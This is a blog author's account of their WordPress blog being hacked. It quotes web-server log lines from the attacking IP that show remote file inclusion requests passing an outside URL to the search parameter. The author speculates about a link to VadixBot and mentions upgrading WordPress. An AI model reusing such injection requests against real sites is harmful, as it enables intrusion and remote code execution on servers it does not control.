It turns out that someone used some sort of an exploit to modify a few of my files and change my password. So I type this post as I sit here and wait for files to upload so I can upgrade my blog and Jaime’s blog.

I started doing some research on this. Here’s the log information for the IP that exploited my blog:

Host: 212.69.204.75
*
/2007/06/06/vadixbot-look-out/index.php?s=http://www.backbreakacres.com/22/test.txt??
Http Code: 404 Date: Apr 21 14:06:08 Http Version: HTTP/1.1 Size in Bytes: -
Referer: -
Agent: Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)

*
/index.php?s=http://www.backbreakacres.com/22/test.txt??
Http Code: 200 Date: Apr 21 14:06:11 Http Version: HTTP/1.1 Size in Bytes: 181
Referer: -
Agent: Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)

The first thing I noticed is that the entry point for the exploit was one of my two VadixBot posts. Hmm. Could this be someone associated with VadixBot trying to shut down my blog to prevent people from learning how VadixBot operates? I am the #1 and #2 results in Google for “VadixBot” and my posts are generally less-than-positive.

So I do some more digging, and find a post at a blog called Teh Spiffy Serena entitled VadixBot – Ban The Hell Out Of It. It’s worth reading if this is the sort of thing that interests you.

But, on the plus side, I’m running WordPress 2.5 now.